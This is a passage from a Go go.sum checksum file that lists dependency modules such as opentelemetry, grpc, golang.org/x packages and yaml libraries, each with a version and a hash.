h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU= github.com/tidwall/pretty v1.2.1 h1:qjsOFOWWQl+N3RsoF5/ssm1pHmJJwhjlSbZ51I6wMl4= github.com/tidwall/pretty v1.2.1/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU= github.com/tidwall/sjson v1.2.5 h1:kLy8mja+1c9jlljvWTlSazM7cKDRfJuR/bOJhcY5NcY= github.com/tidwall/sjson v1.2.5/go.mod h1:Fvgq9kS/6ociJEDnK0Fk1cpYF4FIW6ZF7LAe+6jwd28= github.com/tink-crypto/tink-go/v2 v2.4.0 h1:8VPZeZI4EeZ8P/vB6SIkhlStrJfivTJn+cQ4dtyHNh0= github.com/tink-crypto/tink-go/v2 v2.4.0/go.mod h1:l//evrF2Y3MjdbpNDNGnKgCpo5zSmvUvnQ4MU+yE2sw= github.com/tklauser/go-sysconf v0.3.15 h1:VE89k0criAymJ/Os65CSn1IXaol+1wrsFHEB8Ol49K4= github.com/tklauser/go-sysconf v0.3.15/go.mod h1:Dmjwr6tYFIseJw7a3dRLJfsHAMXZ3nEnL/aZY+0IuI4= github.com/tklauser/numcpus v0.10.0 h1:18njr6LDBk1zuna922MgdjQuJFjrdppsZG60sHGfjso= github.com/tklauser/numcpus v0.10.0/go.mod h1:BiTKazU708GQTYF4mB+cmlpT2Is1gLk7XVuEeem8LsQ= github.com/tonistiigi/go-csvvalue v0.0.0-20240814133006-030d3b2625d0 h1:2f304B10LaZdB8kkVEaoXvAMVan2tl9AiK4G0odjQtE= github.com/tonistiigi/go-csvvalue v0.0.0-20240814133006-030d3b2625d0/go.mod h1:278M4p8WsNh3n4a1eqiFcV2FGk7wE5fwUpUom9mK9lE= github.com/ulikunitz/xz v0.5.15 h1:9DNdB5s+SgV3bQ2ApL10xRc35ck0DuIX/isZvIk+ubY= github.com/ulikunitz/xz v0.5.15/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= github.com/urfave/cli/v3 v3.7.0 h1:AGSnbUyjtLiM+WJUb4dzXKldl/gL+F8OwmRDtVr6g2U= github.com/urfave/cli/v3 v3.7.0/go.mod h1:ysVLtOEmg2tOy6PknnYVhDoouyC/6N42TMeoMzskhso= github.com/vbatts/tar-split v0.12.1 h1:CqKoORW7BUWBe7UL/iqTVvkTBOF8UvOMKOIZykxnnbo= github.com/vbatts/tar-split v0.12.1/go.mod h1:eF6B6i6ftWQcDqEn3/iGFRFRo8cBIMSJVOpnNdfTMFA= github.com/xanzy/ssh-agent v0.3.3 h1:+/15pJfg/RsTxqYcX6fHqOXZwwMP+2VyYWJeWM2qQFM= github.com/xanzy/ssh-agent v0.3.3/go.mod h1:6dzNDKs0J9rVPHPhaGCukekBHKqfl+L3KghI1Bc68Uw= github.com/xeipuuv/gojsonpointer v0.0.0-20180127040702-4e3ac2762d5f/go.mod h1:N2zxlSyiKSe5eX1tZViRH5QA0qijqEDrYZiPEAiq3wU= 
github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb h1:zGWFAtiMcyryUHoUjUJX0/lt1H2+i2Ka2n+D3DImSNo= github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb/go.mod h1:N2zxlSyiKSe5eX1tZViRH5QA0qijqEDrYZiPEAiq3wU= github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 h1:EzJWgHovont7NscjpAxXsDA8S8BMYve8Y5+7cuRE7R0= github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415/go.mod h1:GwrjFmJcFw6At/Gs6z4yjiIwzuJ1/+UwLxMQDVQXShQ= github.com/xeipuuv/gojsonschema v1.2.0 h1:LhYJRs+L4fBtjZUfuSZIKGeVu0QRy8e5Xi7D17UxZ74= github.com/xeipuuv/gojsonschema v1.2.0/go.mod h1:anYRn/JVcOK2ZgGU+IjEV4nwlhoK5sQluxsYJ78Id3Y= github.com/xhit/go-str2duration/v2 v2.1.0 h1:lxklc02Drh6ynqX+DdPyp5pCKLUQpRT8bp8Ydu2Bstc= github.com/xhit/go-str2duration/v2 v2.1.0/go.mod h1:ohY8p+0f07DiV6Em5LKB0s2YpLtXVyJfNt1+BlmyAsU= github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e h1:JVG44RsyaB9T2KIHavMF/ppJZNG9ZpyihvCd0w101no= github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e/go.mod h1:RbqR21r5mrJuqunuUZ/Dhy/avygyECGrLceyNeo4LiM= github.com/yosida95/uritemplate/v3 v3.0.2 h1:Ed3Oyj9yrmi9087+NczuL5BwkIc4wvTb5zIM+UJPGz4= github.com/yosida95/uritemplate/v3 v3.0.2/go.mod h1:ILOh0sOhIJR3+L/8afwt/kE++YT040gmv5BQTMR2HP4= github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= github.com/yuin/goldmark v1.7.12 h1:YwGP/rrea2/CnCtUHgjuolG/PnMxdQtPMO5PvaE2/nY= github.com/yuin/goldmark v1.7.12/go.mod h1:ip/1k0VRfGynBgxOz0yCqHrbZXhcjxyuS66Brc7iBKg= github.com/yuin/goldmark-emoji v1.0.6 h1:QWfF2FYaXwL74tfGOW5izeiZepUDroDJfWubQI9HTHs= github.com/yuin/goldmark-emoji v1.0.6/go.mod h1:ukxJDKFpdFb5x0a5HqbdlcKtebh086iJpI31LTKmWuA= github.com/yusufpapurcu/wmi v1.2.4 h1:zFUKzehAFReQwLys1b/iSMl+JQGSCSjtVqQn9bBrPo0= github.com/yusufpapurcu/wmi v1.2.4/go.mod 
h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0= go.etcd.io/bbolt v1.4.2 h1:IrUHp260R8c+zYx/Tm8QZr04CX+qWS5PGfPdevhdm1I= go.etcd.io/bbolt v1.4.2/go.mod h1:Is8rSHO/b4f3XigBC0lL0+4FwAQv3HXEEIgFMuKHceM= go.opencensus.io v0.24.0 h1:y73uSU6J157QMP2kn2r30vwW1A2W2WFwSCGnAVxeaD0= go.opencensus.io v0.24.0/go.mod h1:vNK8G9p7aAivkbmorf4v+7Hgx+Zs0yY+0fOtgBfjQKo= go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64= go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y= go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0 h1:Hf9xI/XLML9ElpiHVDNwvqI0hIFlzV8dgIr35kV1kRU= go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0/go.mod h1:NfchwuyNoMcZ5MLHwPrODwUF1HWCXWrL31s8gSAdIKY= go.opentelemetry.io/otel v1.39.0 h1:8yPrr/S0ND9QEfTfdP9V+SiwT4E0G7Y5MO7p85nis48= go.opentelemetry.io/otel v1.39.0/go.mod h1:kLlFTywNWrFyEdH0oj2xK0bFYZtHRYUdv1NklR/tgc8= go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.35.0 h1:1fTNlAIJZGWLP5FVu0fikVry1IsiUnXjf7QFvoNN3Xw= go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.35.0/go.mod h1:zjPK58DtkqQFn+YUMbx0M2XV3QgKU0gS9LeGohREyK4= go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.35.0 h1:xJ2qHD0C1BeYVTLLR9sX12+Qb95kfeD/byKj6Ky1pXg= go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.35.0/go.mod h1:u5BF1xyjstDowA1R5QAO9JHzqK+ublenEW/dyqTjBVk= go.opentelemetry.io/otel/metric v1.39.0 h1:d1UzonvEZriVfpNKEVmHXbdf909uGTOQjA0HF0Ls5Q0= go.opentelemetry.io/otel/metric v1.39.0/go.mod h1:jrZSWL33sD7bBxg1xjrqyDjnuzTUB0x1nBERXd7Ftcs= go.opentelemetry.io/otel/sdk v1.39.0 h1:nMLYcjVsvdui1B/4FRkwjzoRVsMK8uL/cj0OyhKzt18= go.opentelemetry.io/otel/sdk v1.39.0/go.mod h1:vDojkC4/jsTJsE+kh+LXYQlbL8CgrEcwmt1ENZszdJE= go.opentelemetry.io/otel/sdk/metric v1.39.0 h1:cXMVVFVgsIf2YL6QkRF4Urbr/aMInf+2WKg+sEJTtB8= go.opentelemetry.io/otel/sdk/metric v1.39.0/go.mod h1:xq9HEVH7qeX69/JnwEfp6fVq5wosJsY1mt4lLfYdVew= go.opentelemetry.io/otel/trace v1.39.0 
h1:2d2vfpEDmCJ5zVYz7ijaJdOF59xLomrvj7bjt6/qCJI= go.opentelemetry.io/otel/trace v1.39.0/go.mod h1:88w4/PnZSazkGzz/w84VHpQafiU4EtqqlVdxWy+rNOA= go.opentelemetry.io/proto/otlp v1.5.0 h1:xJvq7gMzB31/d406fB8U5CBdyQGw4P399D1aQWU/3i4= go.opentelemetry.io/proto/otlp v1.5.0/go.mod h1:keN8WnHxOy8PG0rQZjJJ5A2ebUoafqWp0eVQ4yIXvJ4= go.uber.org/atomic v1.7.0 h1:ADUqmZGgLDDfbSL9ZmPxKTybcoEYHgpYfELNoN+7hsw= go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc= go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU= go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0= go.uber.org/multierr v1.11.0/go.mod h1:20+QtiLqy0Nd6FdQB9TLXag12DsQkrbs3htMFfDN80Y= go.uber.org/zap v1.17.0 h1:MTjgFu6ZLKvY6Pvaqk97GlxNBuMpV4Hy/3P6tRGlI2U= go.uber.org/zap v1.17.0/go.mod h1:MXVU+bhUf/A7Xi2HNOnopQOrmycQ5Ih87HtOu4q5SSo= go.yaml.in/yaml/v2 v2.4.2 h1:DzmwEr2rDGHl7lsFgAHxmNz/1NlQ7xLIrlN2h5d1eGI= go.yaml.in/yaml/v2 v2.4.2/go.mod h1:081UH+NErpNdqlCXm3TtEran0rJZGxAYx9hb/ELlsPU= go.yaml.in/yaml/v3 v3.0.4 h1:tfq32ie2Jv2UxXFdLJdh3jXuOzWiL1fo0bu/FbuKpbc= go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg= go.yaml.in/yaml/v4 v4.0.0-rc.4 h1:UP4+v6fFrBIb1l934bDl//mmnoIZEDK0idg1+AIvX5U= go.yaml.in/yaml/v4 v4.0.0-rc.4/go.mod h1:aZqd9kCMsGL7AuUv/m/PvWLdg5sjJsZ4oHDEnfPPfY0= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= golang.org/x/crypto v0.48.0 h1:/VRzVqiRSggnhY7gNRxPauEQ5Drw9haKdM0jqfcCFts= golang.org/x/crypto 
v0.48.0/go.mod h1:r0kV5h3qnFPlQnBSrULhlsRfryS2pmewsg+XfMgkVos= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20250711185948-6ae5c78190dc h1:TS73t7x3KarrNd5qAipmspBDS1rkMcgVG/fS1aRb4Rc= golang.org/x/exp v0.0.0-20250711185948-6ae5c78190dc/go.mod h1:A+z0yzpGtvnG90cToK5n2tu8UJVP2XUATh+r+sfOOOc= golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/mod v0.32.0 h1:9F4d3PHLljb6x//jOyokMv3eX+YDeepZSEo3mFJy93c= golang.org/x/mod v0.32.0/go.mod h1:SgipZ/3h2Ci89DlEtEXWUk/HteuRin+HHhN+WbNhguU= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20190827160401-ba9fcec4b297/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net 
v0.0.0-20200501053045-e0ff5e5a1de5/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20201110031124-69a78807bb2b/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/net v0.51.0 h1:94R/GTO7mt3/4wIKpcR5gkGmRLOuE/2hNGeWq/GBIFo= golang.org/x/net v0.51.0/go.mod h1:aamm+2QF5ogm02fjy5Bb7CQ0WMt1/WVM7FtyaTLlA9Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw= golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA= golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.20.0 h1:e0PTpb7pjO8GAtTs2dQ6jYa5BWYlMuX047Dco/pItO4= golang.org/x/sync v0.20.0/go.mod h1:9xrNwdLfx4jkKbNva9FpL6vEN7evnE43NNNJQ2LF3+0= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys 
v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20190916202348-b4ddaad3f8a3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220408201424-a24fb2fb8a0f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220615213510-4f61da869c0c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.42.0 h1:omrd2nAlyT5ESRdCLYdm3+fMfNFE/+Rf4bDIQImRJeo= golang.org/x/sys v0.42.0/go.mod h1:4GL1E5IUh+htKOUEOaiffhrAeqysfVGipDYzABqnCmw= golang.org/x/telemetry v0.0.0-20260109210033-bd525da824e2 
h1:O1cMQHRfwNpDfDJerqRoE2oD+AFlyid87D40L/OkkJo= golang.org/x/telemetry v0.0.0-20260109210033-bd525da824e2/go.mod h1:b7fPSJ0pKZ3ccUh8gnTONJxhn3c/PS6tyzQvyqw4iA8= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/term v0.40.0 h1:36e4zGLqU4yhjlmxEaagx2KuYbJq3EwY8K943ZsHcvg= golang.org/x/term v0.40.0/go.mod h1:w2P8uVp06p2iyKKuvXIm7N/y0UCRt3UfJTfZ7oOpglM= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/text v0.34.0 h1:oL/Qq0Kdaqxa1KbNeMKwQq0reLCCaFtqu2eNuSeNHbk= golang.org/x/text v0.34.0/go.mod h1:homfLqTYRFyVYemLBFl5GgL/DWEiH5wcsQ5gSh1yziA= golang.org/x/time v0.12.0 h1:ScB/8o8olJvc+CQPWrK3fPZNfh7qgwCrY0zJmoEQLSE= golang.org/x/time v0.12.0/go.mod h1:CDIdPxbZBQxdj6cxyCIdrNogrJKMJ7pr37NYpMcMDSg= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod 
h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE= golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/tools v0.41.0 h1:a9b8iMweWG+S0OBnlU36rzLp20z1Rp10w+IY2czHTQc= golang.org/x/tools v0.41.0/go.mod h1:XSY6eDqxVNiYgezAVqqCeihT4j1U2CCsqvH3WhQpnlg= golang.org/x/tools/go/expect v0.1.0-deprecated h1:jY2C5HGYR5lqex3gEniOQL0r7Dq5+VGVgY1nudX5lXY= golang.org/x/tools/go/expect v0.1.0-deprecated/go.mod h1:eihoPOH+FgIqa3FpoTwguz/bVUSGBlGQU67vpBeOrBY= golang.org/x/tools/go/packages/packagestest v0.1.1-deprecated h1:1h2MnaIAIXISqTFKdENegdpAgUXz6NrPEsbIeWaBRvM= golang.org/x/tools/go/packages/packagestest v0.1.1-deprecated/go.mod h1:RVAQXBGNv1ib0J382/DPCRS/BPnsGebyM1Gj5VSDpG8= golang.org/x/vuln v1.1.4 h1:Ju8QsuyhX3Hk8ma3CesTbO8vfJD9EvUBgHvkxHBzj0I= golang.org/x/vuln v1.1.4/go.mod h1:F+45wmU18ym/ca5PLTPLsSzr2KppzswxPP603ldA67s= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da h1:noIWHXmPHxILtqtCOPIhSt0ABwskkZKjD3bXGnZGpNY= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da/go.mod h1:NDW/Ps6MPRej6fsCIbMTohpP40sJ/P/vI1MoTEGwX90= gonum.org/v1/gonum v0.16.0 h1:5+ul4Swaf3ESvrOnidPp4GZbzf0mxVQpDCYUQE7OJfk= gonum.org/v1/gonum v0.16.0/go.mod h1:fef3am4MQ93R2HHpKnLk4/Tbh/s0+wqD5nfa6Pnwy4E= google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/genproto 
v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= google.golang.org/genproto v0.0.0-20250707201910-8d1bb00bc6a7 h1:FGOcxvKlJgRBVbXeugjljCfCgfKWhC42FBoYmTCWVBs= google.golang.org/genproto v0.0.0-20250707201910-8d1bb00bc6a7/go.mod h1:249YoW4b1INqFTEop2T4aJgiO7UBYJrpejsaLvjWfI8= google.golang.org/genproto/googleapis/api v0.0.0-20260226221140-a57be14db171 h1:tu/dtnW1o3wfaxCOjSLn5IRX4YDcJrtlpzYkhHhGaC4= google.golang.org/genproto/googleapis/api v0.0.0-20260226221140-a57be14db171/go.mod h1:M5krXqk4GhBKvB596udGL3UyjL4I1+cTbK0orROM9ng= google.golang.org/genproto/googleapis/rpc v0.0.0-20260217215200-42d3e9bedb6d h1:t/LOSXPJ9R0B6fnZNyALBRfZBH0Uy0gT+uR+SJ6syqQ= google.golang.org/genproto/googleapis/rpc v0.0.0-20260217215200-42d3e9bedb6d/go.mod h1:4Hqkh8ycfw05ld/3BWL7rJOSfebL2Q+DVDeRgYgxUU8= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= google.golang.org/grpc v1.79.3 h1:sybAEdRIEtvcD68Gx7dmnwjZKlyfuc61Dyo9pGXXkKE= google.golang.org/grpc v1.79.3/go.mod h1:KmT0Kjez+0dde/v2j9vzwoAScgEPx/Bw1CYChhHLrHQ= google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod 